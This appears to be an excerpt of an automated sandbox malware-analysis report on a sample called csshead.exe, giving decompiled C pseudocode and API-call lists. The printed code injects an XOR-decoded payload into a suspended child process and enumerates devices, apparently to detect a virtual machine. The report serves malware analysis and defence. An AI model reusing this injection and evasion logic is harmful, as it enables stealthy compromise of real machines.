    							DeleteFileA(_t154);
    						}
    						SetCursor(_t111);
    						__eflags = _t154 - 0xc -  *0x440020; // 0x440010
    						if(__eflags != 0) {
    							_t157 =  &(_t154[0xfffffffffffffff4]);
    							_t75 = InterlockedDecrement(_t157);
    							goto L21;
    						}
    						goto L23;
    					}
    				} else {
    					_t112 =  *(__ecx + 0x1c);
    					L00402AC0(_t161 + 0x14, __ecx, __ecx + 0x14);
    					_t158 =  *(_t161 + 0x10);
    					if( *(_t161 + 0x38) != 0 &&  *((intOrPtr*)(_t158 - 8)) == 0) {
    						_t95 = L00422541(_t158, ":/\\<>|:*?\"");
    						_t161 = _t161 + 8;
    						if(_t95 != 0) {
    							_t109 = _t95 - _t158;
    							if(_t95 - _t158 != 0xffffffff) {
    								L00401E10(_t161 + 0x14, _t109);
    								_t158 =  *(_t161 + 0x10);
    							}
    						}
    						_t146 =  *0x440024; // 0x44001c
    						_push(4);
    						 *((intOrPtr*)(_t161 + 0x18)) = _t146;
    						_push(_t161 + 0x18);
    						if( *((intOrPtr*)( *((intOrPtr*)( *_t112 + 0x2c))))() != 0 &&  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x14)) - 8)) != 0) {
    							if(L00402830(_t161 + 0x18, 0x3b) == 0xffffffff) {
    								_t103 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x14)) - 8));
    							}
    							E004024C0(_t161 + 0x18, _t159,  *((intOrPtr*)( *((intOrPtr*)(L004031A0(_t161 + 0x20, _t161 + 0x20, 0, _t103))) - 8)),  *((intOrPtr*)(L004031A0(_t161 + 0x20, _t161 + 0x20, 0, _t103))));
    							L004019A0(_t161 + 0x18);
    							_t158 =  *(_t161 + 0x10);
    						}
    						_t98 =  *((intOrPtr*)(_t161 + 0x14));
    						_t174 = _t98 - 0xc -  *0x440020; // 0x440010
    						if(_t174 == 0) {
    							goto L14;
    						} else {
    							if(InterlockedDecrement(_t98 + 0xfffffff4) <= 0) {
    								_push( *((intOrPtr*)(_t161 + 0x14)) + 0xfffffff4);
    								L004221B4();
    								_t161 = _t161 + 4;
    							}
    						}
    					}
    					_t79 =  *0x440024; // 0x44001c
    					 *((intOrPtr*)(_t161 + 0x20)) = _t79;
    					L00402AC0(_t161 + 0x20, _t159, _t161 + 0x10); // executed
    					asm("sbb edx, edx");
    					 *((intOrPtr*)(_t161 + 0x2c)) = ( ~( *(_t161 + 0x38)) & 0xfffffffd) + 0xefdc;
    					 *(_t161 + 0x30) = 0;
    					 *(_t161 + 0x38) = _t112;
    					if(SendMessageA( *(_t112 + 0x10), RegisterWindowMessageA("WM_DOCMGRDOFILEPROMPT"), 0, _t161 + 0x1c) != 0) {
    						L00402AC0(_t161 + 0x14, _t159, _t161 + 0x1c);
    						_t85 =  *(_t161 + 0x1c);
    						__eflags = _t85 - 0xc -  *0x440020; // 0x440010
    						if(__eflags != 0) {
    							_t87 = InterlockedDecrement(_t85 + 0xfffffff4);
    							__eflags = _t87;
    							if(_t87 <= 0) {
    								_t144 =  *(_t161 + 0x1c) + 0xfffffff4;
    								__eflags = _t144;
    								_push(_t144);
    								L004221B4();
    								_t161 = _t161 + 4;
    							}
    						}
    						_t154 =  *(_t161 + 0x10);
    						goto L28;
    					} else {
    						_t89 =  *(_t161 + 0x1c);
    						_t177 = _t89 - 0xc -  *0x440020; // 0x440010
    						if(_t177 != 0 && InterlockedDecrement(_t89 + 0xfffffff4) <= 0) {
    							_push( *(_t161 + 0x1c) + 0xfffffff4);
    							L004221B4();
    							_t161 = _t161 + 4;
    						}
    						_t180 = _t158 - 0xc -  *0x440020; // 0x440010
    						if(_t180 != 0) {
    							_t157 =  &(_t158[0xfffffffffffffff4]);
    							_t75 = InterlockedDecrement(_t157);
    							L21:
    							if(_t75 <= 0) {
    								_push(_t157);
    								L004221B4();
    							}
    						}
    						L23:
    						return 0;
    					}
    				}
    			}

    APIs
      • Part of subcall function 00403120: lstrlenA.KERNEL32(?), ref: 00403150
      • Part of subcall function 00402AC0: InterlockedDecrement.KERNEL32(00000000), ref: 00402B0B
      • Part of subcall function 00402AC0: InterlockedIncrement.KERNEL32 ref: 00402B33
      • Part of subcall function 004024C0: InterlockedDecrement.KERNEL32(00000001), ref: 0040252D
      • Part of subcall function 004019A0: InterlockedDecrement.KERNEL32 ref: 004019B4
    • InterlockedDecrement.KERNEL32(?), ref: 0040345B
      • Part of subcall function 00401E10: lstrlenA.KERNEL32(?), ref: 00401E24
    • RegisterWindowMessageA.USER32(WM_DOCMGRDOFILEPROMPT,00000000,?), ref: 004034BD
    • SendMessageA.USER32(?,00000000), ref: 004034C8
    • InterlockedDecrement.KERNEL32(?), ref: 004034E5
    • InterlockedDecrement.KERNEL32(?), ref: 0040350A
    • InterlockedDecrement.KERNEL32(?), ref: 00403546
    • LoadCursorA.USER32(00000000,00007F02), ref: 00403567
    • SetCursor.USER32(00000000), ref: 00403574
    • DeleteFileA.KERNEL32(?), ref: 0040358E
    • SetCursor.USER32(00000000), ref: 00403595
    • InterlockedDecrement.KERNEL32(?), ref: 004035AA
    • SetCursor.USER32(00000000), ref: 004035CC
    • InterlockedDecrement.KERNEL32(?), ref: 004035DD
    • SetCursor.USER32(00000000), ref: 004035FD
    • InterlockedDecrement.KERNEL32(?), ref: 0040360E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd

    Control-flow Graph

    C-Code - Quality: 98%
    			E00405028(CHAR* _a4, struct HINSTANCE__* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24) {
    				long _v8;
    				void* _v12;
    				void* _v16;
    				long _v20;
    				long _v24;
    				void* _v28;
    				signed int _v32;
    				long _v36;
    				long _v40;
    				char _v44;
    				struct _STARTUPINFOA _v112;
    				void* _v124;
    				struct _CONTEXT _v332;
    				char _v353;
    				signed int _t107;
    				void* _t125;
    				void* _t127;
    				void* _t144;
    				long _t154;
    
    				_v8 = 0xffffffff;
    				if(_a8 == 0) {
    					_a8 = GetModuleHandleA(0);
    				}
    				if(_a16 != 0 && _a20 == 0xffffffff) {
    					_a20 = E004012DC(_a16) + 1;
    				}
    				E00401258( &_v112, 0x44);
    				_v112.cb = 0x44;
    				_t107 = CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v112,  &(_v332.ExtendedRegisters)); // executed
    				asm("sbb eax, eax");
    				_t109 =  ~( ~_t107);
    				if( ~( ~_t107) == 0) {
    					L22:
    					return _v8;
    				}
    				E00401164(E004010B4(_t109, 0x44),  &_v353);
    				E0040133C( &_v353, "_section");
    				_v24 =  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x3c)) + _a8 + 0x50));
    				_t125 = CreateFileMappingA(0xffffffff, 0, 4, 0, _v24 + 8 + _a20,  &_v353); // executed
    				_v12 = _t125;
    				_t127 = MapViewOfFile(_v12, 0xf001f, 0, 0, 0); // executed
    				_v16 = _t127;
    				E004012B8(_v16, _v24, _a8);
    				 *((intOrPtr*)(_v16 + _v24)) = _a12 - _a8;
    				 *((intOrPtr*)(_v16 + _v24 + 4)) = _a20;
    				E004012B8(_v16 + _v24 + 8, _a20, _a16);
    				_v24 = 0x29b;
    				E004013B4( &_v28, _v24 + 0x11); // executed
    				E004012B8(_v28, _v24, 0x40a2ac);
    				_t144 = _v24 - 1;
    				if(_t144 < 0) {
    					L9:
    					_v20 = E004012DC( &_v353) + 1;
    					E004012B8(_v28 + _v24, _v20,  &_v353);
    					_v24 = _v24 + _v20;
    					_v40 = 0;
    					_t154 = E00404EF0(_v332.ExtendedRegisters.hProcess, _t224); // executed
    					_v40 = _t154;
    					if(_v40 == 0) {
    						E00401258( &_v332, 0xcc);
    						_v332.ContextFlags = 0x10007;
    						if(GetThreadContext(_v124,  &_v332) != 0 && _v332.Eax != 0) {
    							_v40 = _v332.Eax;
    						}
    					}
    					_t228 = _v40;
    					if(_v40 == 0) {
    						_v40 = E00404DE0(_v332.ExtendedRegisters.hProcess, _t228);
    					}
    					if(_v40 != 0) {
    						VirtualProtectEx(_v332.ExtendedRegisters.hProcess, _v40, _v24, 0x40,  &_v36); // executed
    						WriteProcessMemory(_v332.ExtendedRegisters.hProcess, _v40, _v28, _v24,  &_v20); // executed
    						E00401828(_v28); // executed
    						ResumeThread(_v124); // executed
    						if(_a24 == 0) {
    							__eflags = 0;
    							_v8 = 0;
    						} else {
    							if(WaitForSingleObject(_v332.ExtendedRegisters.hProcess, _a24) != 0) {
    								_v8 = 0xfffffffe;
    							} else {
    								GetExitCodeProcess(_v332.ExtendedRegisters.hProcess,  &_v8);
    							}
    						}
    						CloseHandle(_v124);
    						CloseHandle(_v332.ExtendedRegisters);
    					}
    					goto L22;
    				}
    				_v44 = _t144 + 1;
    				_v32 = 0;
    				do {
    					 *(_v28 + _v32) =  *(_v28 + _v32) ^ 0x000000e4 + _v32 * 0xffffff9b;
    					_v32 = _v32 + 1;
    					_t55 =  &_v44;
    					 *_t55 = _v44 - 1;
    					_t224 =  *_t55;
    				} while ( *_t55 != 0);
    				goto L9;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(00000000), ref: 00405040
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0040508F
    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,?), ref: 004050F5
    • MapViewOfFile.KERNELBASE(?,000F001F,00000000,00000000,00000000), ref: 0040510D
      • Part of subcall function 004013B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 004013CD
      • Part of subcall function 00404EF0: ReadProcessMemory.KERNELBASE(?,00000000,?,00001000,?), ref: 00404F3A
      • Part of subcall function 00404EF0: ReadProcessMemory.KERNELBASE(?,00000000,?,00001000,?), ref: 00404F69
      • Part of subcall function 00404EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00000018,?), ref: 00404FBC
      • Part of subcall function 00404EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00001000,?), ref: 00404FED
    • GetThreadContext.KERNEL32(?,00010007), ref: 00405209
    • CloseHandle.KERNEL32(?), ref: 004052C8
      • Part of subcall function 00404DE0: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 00404E09
      • Part of subcall function 00404DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E39
      • Part of subcall function 00404DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E5A
      • Part of subcall function 00404DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E7E
    • VirtualProtectEx.KERNELBASE(?,00000000,0000029B,00000040,?), ref: 00405252
    • WriteProcessMemory.KERNELBASE(?,00000000,?,0000029B,?), ref: 0040526C
      • Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A
    • ResumeThread.KERNELBASE(?), ref: 0040527E
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 00405292
    • GetExitCodeProcess.KERNEL32(?,?), ref: 004052A4
    • CloseHandle.KERNEL32(?), ref: 004052BE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd

    Control-flow Graph

    C-Code - Quality: 98%
    			E00405026(CHAR* _a4, struct HINSTANCE__* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24) {
    				long _v8;
    				void* _v12;
    				void* _v16;
    				long _v20;
    				long _v24;
    				void* _v28;
    				signed int _v32;
    				long _v36;
    				long _v40;
    				char _v44;
    				struct _STARTUPINFOA _v112;
    				void* _v124;
    				struct _CONTEXT _v332;
    				char _v353;
    				signed int _t107;
    				void* _t125;
    				void* _t127;
    				void* _t144;
    				long _t154;
    
    				_v8 = 0xffffffff;
    				if(_a8 == 0) {
    					_a8 = GetModuleHandleA(0);
    				}
    				if(_a16 != 0 && _a20 == 0xffffffff) {
    					_a20 = E004012DC(_a16) + 1;
    				}
    				E00401258( &_v112, 0x44);
    				_v112.cb = 0x44;
    				_t107 = CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v112,  &(_v332.ExtendedRegisters)); // executed
    				asm("sbb eax, eax");
    				_t109 =  ~( ~_t107);
    				if( ~( ~_t107) == 0) {
    					L23:
    					return _v8;
    				} else {
    					E00401164(E004010B4(_t109, 0x44),  &_v353);
    					E0040133C( &_v353, "_section");
    					_v24 =  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x3c)) + _a8 + 0x50));
    					_t125 = CreateFileMappingA(0xffffffff, 0, 4, 0, _v24 + 8 + _a20,  &_v353); // executed
    					_v12 = _t125;
    					_t127 = MapViewOfFile(_v12, 0xf001f, 0, 0, 0); // executed
    					_v16 = _t127;
    					E004012B8(_v16, _v24, _a8);
    					 *((intOrPtr*)(_v16 + _v24)) = _a12 - _a8;
    					 *((intOrPtr*)(_v16 + _v24 + 4)) = _a20;
    					E004012B8(_v16 + _v24 + 8, _a20, _a16);
    					_v24 = 0x29b;
    					E004013B4( &_v28, _v24 + 0x11); // executed
    					E004012B8(_v28, _v24, 0x40a2ac);
    					_t144 = _v24 - 1;
    					if(_t144 < 0) {
    						L10:
    						_v20 = E004012DC( &_v353) + 1;
    						E004012B8(_v28 + _v24, _v20,  &_v353);
    						_v24 = _v24 + _v20;
    						_v40 = 0;
    						_t154 = E00404EF0(_v332.ExtendedRegisters.hProcess, _t229); // executed
    						_v40 = _t154;
    						if(_v40 == 0) {
    							E00401258( &_v332, 0xcc);
    							_v332.ContextFlags = 0x10007;
    							if(GetThreadContext(_v124,  &_v332) != 0 && _v332.Eax != 0) {
    								_v40 = _v332.Eax;
    							}
    						}
    						_t233 = _v40;
    						if(_v40 == 0) {
    							_v40 = E00404DE0(_v332.ExtendedRegisters.hProcess, _t233);
    						}
    						if(_v40 != 0) {
    							VirtualProtectEx(_v332.ExtendedRegisters.hProcess, _v40, _v24, 0x40,  &_v36); // executed
    							WriteProcessMemory(_v332.ExtendedRegisters.hProcess, _v40, _v28, _v24,  &_v20); // executed
    							E00401828(_v28); // executed
    							ResumeThread(_v124); // executed
    							if(_a24 == 0) {
    								__eflags = 0;
    								_v8 = 0;
    							} else {
    								if(WaitForSingleObject(_v332.ExtendedRegisters.hProcess, _a24) != 0) {
    									_v8 = 0xfffffffe;
    								} else {
    									GetExitCodeProcess(_v332.ExtendedRegisters.hProcess,  &_v8);
    								}
    							}
    							CloseHandle(_v124);
    							CloseHandle(_v332.ExtendedRegisters);
    						}
    						goto L23;
    					}
    					_v44 = _t144 + 1;
    					_v32 = 0;
    					do {
    						 *(_v28 + _v32) =  *(_v28 + _v32) ^ 0x000000e4 + _v32 * 0xffffff9b;
    						_v32 = _v32 + 1;
    						_t55 =  &_v44;
    						 *_t55 = _v44 - 1;
    						_t229 =  *_t55;
    					} while ( *_t55 != 0);
    					goto L10;
    				}
    			}

    APIs
    • GetModuleHandleA.KERNEL32(00000000), ref: 00405040
    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0040508F
    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,?), ref: 004050F5
    • MapViewOfFile.KERNELBASE(?,000F001F,00000000,00000000,00000000), ref: 0040510D
      • Part of subcall function 004013B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 004013CD
      • Part of subcall function 00404EF0: ReadProcessMemory.KERNELBASE(?,00000000,?,00001000,?), ref: 00404F3A
      • Part of subcall function 00404EF0: ReadProcessMemory.KERNELBASE(?,00000000,?,00001000,?), ref: 00404F69
      • Part of subcall function 00404EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00000018,?), ref: 00404FBC
      • Part of subcall function 00404EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00001000,?), ref: 00404FED
    • GetThreadContext.KERNEL32(?,00010007), ref: 00405209
    • CloseHandle.KERNEL32(?), ref: 004052C8
      • Part of subcall function 00404DE0: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 00404E09
      • Part of subcall function 00404DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E39
      • Part of subcall function 00404DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E5A
      • Part of subcall function 00404DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E7E
    • VirtualProtectEx.KERNELBASE(?,00000000,0000029B,00000040,?), ref: 00405252
    • WriteProcessMemory.KERNELBASE(?,00000000,?,0000029B,?), ref: 0040526C
      • Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A
    • ResumeThread.KERNELBASE(?), ref: 0040527E
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 00405292
    • GetExitCodeProcess.KERNEL32(?,?), ref: 004052A4
    • CloseHandle.KERNEL32(?), ref: 004052BE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd

    Control-flow Graph

    C-Code - Quality: 66%
    			E00406ECE(signed char __eax, void* __ecx, void* __edx, void* __esi, char _a1) {
    				intOrPtr _v4;
    				void* _v8;
    				void* _v12;
    				struct HINSTANCE__* _v16;
    				signed int _v20;
    				void* _v28;
    				CHAR* _v36;
    				void* _v157;
    				void* _v188;
    				char* __ebp;
    				void* _t115;
    
    				_t115 = __ecx;
    				_t57 = __eax;
    				if(__esi + 1 <= 0) {
    					L7:
    					__eflags =  *(_t115 - 0x45ffffff) & _t57;
    				} else {
    					if(__eflags <= 0) {
    						asm("lock lea eax, [ebp-0x209]");
    						if(E00401110(__eax, _v16) != 0) {
    							_v4 = 0xffffffff;
    						}
    						E00401440(_v16);
    						return _v4;
    					} else {
    						asm("rol esi, 1");
    						asm("sahf");
    						asm("out 0x48, al");
    						asm("salc");
    						asm("sbb [eax], eax");
    						__eax->i = __eax->i + __al;
    						__dh = __dh + __al;
    						asm("repne shl dl, 0x4a");
    						__ebp =  &_a1;
    						_push(es);
    						asm("rol byte [fs:eax], 0x0");
    						_push( &_a1);
    						__ebp = __esp;
    						__esp = __esp + 0xffffff44;
    						__eax = 0;
    						_v16 = 0;
    						__eax =  *0x40a55c; // 0x406ed0
    						_v36 = __eax;
    						__eax = _v36;
    						__eax = LoadLibraryA(_v36); // executed
    						_v20 = __eax;
    						__eax = _v36;
    						__eax = E00401440(_v36);
    						__eflags = _v20;
    						if (_v20 == 0) goto L13;
    						goto L7;
    					}
    				}
    			}

    APIs
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
    • LoadLibraryA.KERNELBASE(?), ref: 00406F0B
    • SetupDiGetClassDevsA.SETUPAPI(0040A014,00000000,00000000,00000002), ref: 00406F79
    • SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 00406FA7
    • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,00000000,?,00000000,00000081,?), ref: 00406FCE
    • CharLowerBuffA.USER32(00000000,00000000), ref: 00406FE7
    • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 00406FF1
    • SetupDiGetClassDevsA.SETUPAPI(0040A024,00000000,00000000,00000002), ref: 00407028
    • SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 00407056
    • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,0000000C,?,00000000,00000081,?), ref: 0040707D
    • CharLowerBuffA.USER32(00000000,00000000), ref: 00407096
    • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 004070A0
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd

    Control-flow Graph

    APIs
    • GetStartupInfoW.KERNEL32(?,0043CD78,00000058), ref: 00424C11
    • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000), ref: 00424C26
      • Part of subcall function 0042769E: HeapCreate.KERNELBASE(00000000,00001000,00000000,00424C7A), ref: 004276A7
      • Part of subcall function 004260A2: GetModuleHandleW.KERNEL32(00436FF4,?,00424C8B), ref: 004260AA
      • Part of subcall function 004260A2: TlsAlloc.KERNEL32(?,00424C8B), ref: 00426143
      • Part of subcall function 004260A2: RtlEncodePointer.NTDLL(?,00424C8B), ref: 00426179
      • Part of subcall function 004260A2: RtlEncodePointer.NTDLL(?,00424C8B), ref: 00426186
      • Part of subcall function 004260A2: RtlEncodePointer.NTDLL(?,00424C8B), ref: 00426193
      • Part of subcall function 004260A2: RtlEncodePointer.NTDLL(?,00424C8B), ref: 004261A0
      • Part of subcall function 004260A2: RtlDecodePointer.NTDLL(Function_00015F05,?,00424C8B), ref: 004261C1
      • Part of subcall function 004260A2: RtlDecodePointer.NTDLL(00000000,?,00424C8B), ref: 004261F0
      • Part of subcall function 004260A2: GetCurrentThreadId.KERNEL32 ref: 00426202
    • __RTC_Initialize.LIBCMT ref: 00424C97
      • Part of subcall function 0042CE7D: GetStartupInfoW.KERNEL32(?), ref: 0042CE8A
      • Part of subcall function 0042CE7D: GetFileType.KERNEL32(?), ref: 0042CFBD
      • Part of subcall function 0042CE7D: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00000FA0), ref: 0042CFF3
      • Part of subcall function 0042CE7D: GetStdHandle.KERNEL32(-000000F6), ref: 0042D047
      • Part of subcall function 0042CE7D: GetFileType.KERNEL32(00000000), ref: 0042D059
      • Part of subcall function 0042CE7D: InitializeCriticalSectionAndSpinCount.KERNEL32(-00443954,00000FA0), ref: 0042D087
      • Part of subcall function 0042CE7D: SetHandleCount.KERNEL32 ref: 0042D0B0
    • __amsg_exit.LIBCMT ref: 00424CAA
    • GetCommandLineA.KERNEL32 ref: 00424CB0
      • Part of subcall function 0042CDE6: GetEnvironmentStringsW.KERNEL32 ref: 0042CDF0
      • Part of subcall function 0042CDE6: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042CE64
      • Part of subcall function 0042CDE6: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042CE70
      • Part of subcall function 0042CD2B: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\csshead.exe,00000104), ref: 0042CD57
      • Part of subcall function 0042CD2B: _parse_cmdline.LIBCMT ref: 0042CD82
      • Part of subcall function 0042CD2B: _parse_cmdline.LIBCMT ref: 0042CDC3
    • __amsg_exit.LIBCMT ref: 00424CD0
      • Part of subcall function 0042CAB5: _strlen.LIBCMT ref: 0042CADF
      • Part of subcall function 0042CAB5: _strlen.LIBCMT ref: 0042CB10
    • __amsg_exit.LIBCMT ref: 00424CE1
      • Part of subcall function 00424443: __initterm_e.LIBCMT ref: 00424479
    • __amsg_exit.LIBCMT ref: 00424CF4
      • Part of subcall function 00419D20: CoInitialize.OLE32(00000000), ref: 00419D2C
      • Part of subcall function 00419D20: NtdllDefWindowProc_A.NTDLL(00000000,00000000,00000000,00000000), ref: 00419D3A
      • Part of subcall function 00419D20: GetCommandLineA.KERNEL32 ref: 00419DA4
      • Part of subcall function 00419D20: CreateMenu.USER32 ref: 00419EAE
      • Part of subcall function 00419D20: LoadBitmapA.USER32(?,00433E0C), ref: 00419EDC
      • Part of subcall function 00419D20: AppendMenuA.USER32(00000000,00000014,?,00000000), ref: 00419EEC
      • Part of subcall function 00419D20: BeginDeferWindowPos.USER32(00442A98), ref: 00419F07
      • Part of subcall function 00419D20: CreateMetaFileA.GDI32(?), ref: 00419F2B
      • Part of subcall function 00419D20: SetBrushOrgEx.GDI32(00000000,00000001,00000000,00000000), ref: 00419F3A
      • Part of subcall function 00419D20: LoadImageA.USER32(?,?,00000001,00000010,00000010,00000000), ref: 00419F6A
      • Part of subcall function 00419D20: FtpPutFileEx.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0041A00D
      • Part of subcall function 00419D20: GetSysColorBrush.USER32(0000000F), ref: 0041A084
      • Part of subcall function 00419D20: FrameRect.USER32(00000000,?,00000000), ref: 0041A094
      • Part of subcall function 00419D20: GlobalAlloc.KERNELBASE(00001000,00000838), ref: 0041A0C0
      • Part of subcall function 00419D20: GetLastError.KERNEL32 ref: 0041A101
      • Part of subcall function 00419D20: GetIconInfo.USER32(00000000,?), ref: 0041A12D
      • Part of subcall function 00419D20: GetIconInfo.USER32(00000000,?), ref: 0041A14D
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd

    Control-flow Graph
    • Basic blocks 4260a2-42621c (rendered executed / not-executed graph not reproduced in text)
    APIs
    • GetModuleHandleW.KERNEL32(00436FF4,?,00424C8B), ref: 004260AA
    • TlsAlloc.KERNEL32(?,00424C8B), ref: 00426143
    • RtlEncodePointer.NTDLL(?,00424C8B), ref: 00426179
    • RtlEncodePointer.NTDLL(?,00424C8B), ref: 00426186
    • RtlEncodePointer.NTDLL(?,00424C8B), ref: 00426193
    • RtlEncodePointer.NTDLL(?,00424C8B), ref: 004261A0
      • Part of subcall function 0042BF11: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0), ref: 0042BF39
    • RtlDecodePointer.NTDLL(Function_00015F05,?,00424C8B), ref: 004261C1
      • Part of subcall function 0042A124: Sleep.KERNEL32(00000000), ref: 0042A14C
    • RtlDecodePointer.NTDLL(00000000,?,00424C8B), ref: 004261F0
      • Part of subcall function 00425DBE: GetModuleHandleW.KERNEL32(00436FF4,0043CE18,00000008,00425EC6,00000000,00000000,?,?,00417F96,00000009), ref: 00425DCF
      • Part of subcall function 00425DBE: InterlockedIncrement.KERNEL32(004418D8), ref: 00425E10
    • GetCurrentThreadId.KERNEL32 ref: 00426202
      • Part of subcall function 00425D81: RtlDecodePointer.NTDLL(0044204C), ref: 00425D92
      • Part of subcall function 00425D81: TlsFree.KERNEL32(00442050,00426218,?,00424C8B), ref: 00425DAC
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 56%
    			E00424C01(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
    				intOrPtr _t22;
    				void* _t26;
    				intOrPtr _t28;
    				void* _t29;
    				void* _t30;
    				void* _t31;
    				void* _t32;
    				void* _t47;
    				signed int _t48;
    				void* _t51;
    				void* _t55;
    				void* _t58;
    				void* _t67;
    
    				_t67 = __fp0;
    				_t52 = __edi;
    				_t51 = __edx;
    				_t45 = __ebx;
    				_push(0x58);
    				_push(0x43cd78);
    				L00429EF0(__ebx, __edi, __esi);
    				GetStartupInfoW(_t55 - 0x68);
    				if( *0x444a94 == 0) {
    					 *0x4331a0(0, 1, 0, 0);
    				}
    				_t58 =  *0x400000 - 0x5a4d; // 0x5a4d
    				if(_t58 == 0) {
    					_t22 =  *0x40003c; // 0xe8
    					__eflags =  *((intOrPtr*)(_t22 + 0x400000)) - 0x4550;
    					if( *((intOrPtr*)(_t22 + 0x400000)) != 0x4550) {
    						goto L3;
    					} else {
    						_t46 = 0x10b;
    						__eflags =  *((intOrPtr*)(_t22 + 0x400018)) - 0x10b;
    						if( *((intOrPtr*)(_t22 + 0x400018)) != 0x10b) {
    							goto L3;
    						} else {
    							__eflags =  *((intOrPtr*)(_t22 + 0x400074)) - 0xe;
    							if( *((intOrPtr*)(_t22 + 0x400074)) <= 0xe) {
    								goto L3;
    							} else {
    								__eflags =  *(_t22 + 0x4000e8);
    								_t8 =  *(_t22 + 0x4000e8) != 0;
    								__eflags = _t8;
    								_t46 = 0 | _t8;
    								 *(_t55 - 0x1c) = _t8;
    							}
    						}
    					}
    				} else {
    					L3:
    					 *(_t55 - 0x1c) = 0;
    				}
    				if(E0042769E() == 0) {
    					E00424BD8(0x1c);
    					_pop(_t46);
    				}
    				if(E004260A2(_t45, _t67) == 0) {
    					E00424BD8(0x10);
    					_pop(_t46);
    				}
    				L0042C2D2();
